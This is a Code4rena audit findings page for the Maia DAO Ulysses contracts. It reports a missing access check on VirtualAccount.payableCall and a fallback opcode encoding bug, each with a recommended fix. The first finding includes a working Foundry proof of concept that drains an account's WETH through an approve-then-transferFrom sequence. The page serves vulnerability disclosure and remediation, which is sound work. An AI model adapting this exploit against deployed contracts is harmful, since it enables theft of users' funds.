Maia DAO - Ulysses - SpicyMeatball's results

Harnessing the power of Arbitrum, Ulysses Omnichain specializes in Virtualized Liquidity Management.

General Information

Platform: Code4rena

Start Date: 22/09/2023

Pot Size: $100,000 USDC

Total HM: 15

Participants: 175

Period: 14 days

Judge: alcueca

Total Solo HM: 4

Id: 287

League: ETH

Maia DAO

Findings Distribution

Researcher Performance

Rank: 41/175

Findings: 2

Award: $113.04

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112

Vulnerability details

Impact

The VirtualAccount contract stores a user's funds; only the owner or an authorized router is allowed to transfer tokens out of it. This is not the case for the permissionless function payableCall: an attacker can construct a malicious payload and execute it from the VirtualAccount, for example approving the maximum amount of tokens and then calling transferFrom to move them to his own address.

Proof of Concept

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

import "./helpers/ImportHelper.sol";
import "forge-std/Test.sol";
import {VirtualAccount, PayableCall} from "src/VirtualAccount.sol";
import "./mocks/WETH9.sol";

// Stand-in port that approves no router, so only the owner should be able to move funds.
contract DummyPort {
    function isRouterApproved(VirtualAccount, address) external pure returns (bool) {
        return false;
    }
}

contract VirtualAccountC4 is Test {
    VirtualAccount target;
    WETH9 weth;
    DummyPort port;

    function setUp() public {
        port = new DummyPort();
        weth = new WETH9();
        // The test contract is the account owner; the dummy port approves nobody.
        target = new VirtualAccount(address(this), address(port));
        // Fund the virtual account with 100 WETH.
        weth.deposit{value: 100e18}();
        weth.transfer(address(target), 100e18);
    }

    function testVirtualThief() public {
        address mal = makeAddr("Mal");
        uint256 amount = weth.balanceOf(address(target));

        // The guarded path rejects a non-owner, non-router caller as expected.
        vm.prank(mal);
        vm.expectRevert();
        target.withdrawERC20(address(weth), amount);

        // The unguarded payableCall lets the same caller route an approve() through the account.
        PayableCall[] memory calls = new PayableCall[](1);
        bytes memory payload = abi.encodeWithSignature("approve(address,uint256)", mal, type(uint256).max);
        calls[0] = PayableCall(address(weth), payload, 0);

        vm.startPrank(mal);
        target.payableCall(calls);
        weth.transferFrom(address(target), mal, amount);
        assertEq(weth.balanceOf(mal), amount);
    }
}

Tools Used

Foundry

Apply the requiresApprovedCaller modifier to payableCall.
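The hardened shape of payableCall, as an added illustrative example rather than Maia DAO's own code: a stripped-down account contract where the same approved-caller check that protects withdrawERC20 also guards the batched call path. The PayableCall struct layout, the IPort interface, the error names and the msg.value accounting are assumptions made for this example; only the isRouterApproved(account, router) signature and the modifier name come from the report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Added illustrative example, not Maia DAO's code. Struct layout, IPort,
// error names and the value accounting are assumptions for this example.

struct PayableCall {
    address target;
    bytes callData;
    uint256 value;
}

interface IPort {
    function isRouterApproved(address account, address router) external view returns (bool);
}

contract GuardedVirtualAccount {
    address public immutable userAddress;
    address public immutable localPortAddress;

    error UnauthorizedCaller();
    error CallFailed(uint256 index, bytes returnData);
    error ValueMismatch(uint256 sent, uint256 requested);

    constructor(address _userAddress, address _localPortAddress) {
        userAddress = _userAddress;
        localPortAddress = _localPortAddress;
    }

    // Only the account owner or a router the port has approved may act for this account.
    modifier requiresApprovedCaller() {
        if (msg.sender != userAddress && !IPort(localPortAddress).isRouterApproved(address(this), msg.sender)) {
            revert UnauthorizedCaller();
        }
        _;
    }

    // Vulnerable shape, for contrast: the same function with no modifier lets any caller
    // route arbitrary calls (such as an ERC-20 approve) through this account.
    function payableCall(PayableCall[] calldata calls)
        external
        payable
        requiresApprovedCaller
        returns (bytes[] memory returnData)
    {
        uint256 valAccumulator;
        uint256 length = calls.length;
        returnData = new bytes[](length);

        for (uint256 i = 0; i < length; ++i) {
            PayableCall calldata c = calls[i];
            valAccumulator += c.value;
            (bool success, bytes memory data) = c.target.call{value: c.value}(c.callData);
            if (!success) revert CallFailed(i, data);
            returnData[i] = data;
        }

        // Refuse batches whose declared values do not add up to the ETH sent with the transaction.
        if (msg.value != valAccumulator) revert ValueMismatch(msg.value, valAccumulator);
    }

    receive() external payable {}
}
```

With the modifier in place, the PoC above fails at target.payableCall(calls) with UnauthorizedCaller, since the dummy port approves no router and mal is not the owner; a Foundry test can assert this with vm.expectRevert(GuardedVirtualAccount.UnauthorizedCaller.selector).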

Assessed type

call/delegatecall

#0 - c4-pre-sort

2023-10-08T14:33:42Z

0xA5DF marked the issue as duplicate of #888

#1 - c4-pre-sort

2023-10-08T14:40:52Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-26T11:31:52Z

alcueca marked the issue as satisfactory

Findings Information

🌟 Selected for report: kodyvim

Also found by: 0xnev, Kow, QiuhaoLi, SpicyMeatball, ast3ros, ayden, bin2chen, chaduke, jasonxiale, minhtrng, nobody2018

Labels

bug
2 (Med Risk)
satisfactory
sufficient quality report
duplicate-397

Awards

112.9294 USDC - $112.93

External Links

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L1090

Vulnerability details

Impact

Calling callOutAndBridgeMultiple with _hasFallbackToggled set to true won't enable the fallback if the call fails on the receiving chain.

Proof of Concept

When callOutAndBridgeMultiple is called, the RootBridgeAgent prepares a settlement payload with the _createSettlementMultiple function. The first byte of this payload is an operation code: 0x82 if the fallback is enabled, 0x02 otherwise. Unfortunately an error in the encoding prevents the flag from being set to 0x82 when the fallback is enabled

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L1090

making it always 0x02.

As you can see, on the receiving end in the BranchBridgeAgent the correct value 0x82 is expected in order to enable the fallback:

https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchBridgeAgent.sol#L651

Tools Used

Manual review

Set the flag to 0x82 if the fallback is toggled, just like in _performRetrySettlementCall:

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L894
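An added example, not Maia DAO's code, of how the root-side encoder and the branch-side decoder have to agree on the operation byte: the fallback flag is the high bit 0x80 on top of the 0x02 settlement-multiple opcode, and a round-trip check catches any encoder that emits 0x02 for both toggle states. The library and contract names, the constant names and the trailing uint32 nonce in the sample payload are assumptions made for this example; only the 0x02 and 0x82 values come from the report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Added illustrative example, not Maia DAO's code. Names are assumptions;
// the 0x02 / 0x82 opcode values are the ones described in the report.
library SettlementOpcode {
    bytes1 internal constant SETTLEMENT_MULTIPLE = 0x02;
    bytes1 internal constant FALLBACK_FLAG = 0x80;

    // Root side: derive the first payload byte from the caller's toggle.
    // Setting the high bit yields 0x82; leaving it clear yields 0x02.
    function encode(bool hasFallbackToggled) internal pure returns (bytes1) {
        return hasFallbackToggled ? SETTLEMENT_MULTIPLE | FALLBACK_FLAG : SETTLEMENT_MULTIPLE;
    }

    // Branch side: read the first byte and decide whether a failed execution
    // should be recorded so the settlement can be retried or retrieved.
    function decode(bytes memory payload) internal pure returns (uint8 op, bool fallbackEnabled) {
        require(payload.length > 0, "empty payload");
        bytes1 flag = payload[0];
        if (flag == 0x82) return (0x02, true);
        if (flag == 0x02) return (0x02, false);
        revert("unknown settlement opcode");
    }
}

contract SettlementOpcodeCheck {
    // Round-trip check a reviewer can call from a Foundry test for both toggle states.
    // An encoder that always produces 0x02 fails this for hasFallbackToggled == true.
    function roundTrip(bool hasFallbackToggled) external pure returns (bool) {
        // Constructed sample payload: opcode byte followed by a dummy nonce.
        bytes memory payload = abi.encodePacked(SettlementOpcode.encode(hasFallbackToggled), uint32(1));
        (uint8 op, bool fallbackEnabled) = SettlementOpcode.decode(payload);
        return op == 0x02 && fallbackEnabled == hasFallbackToggled;
    }
}
```

Keeping a single encoder and decoder pair for the opcode byte, instead of hand-writing the literal in each call path, is what prevents _createSettlementMultiple and _performRetrySettlementCall from drifting apart in the way this report describes.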

Assessed type

en/de-code

#0 - c4-pre-sort

2023-10-08T05:18:46Z

0xA5DF marked the issue as duplicate of #882

#1 - c4-pre-sort

2023-10-08T15:01:37Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-25T10:03:49Z

alcueca marked the issue as satisfactory
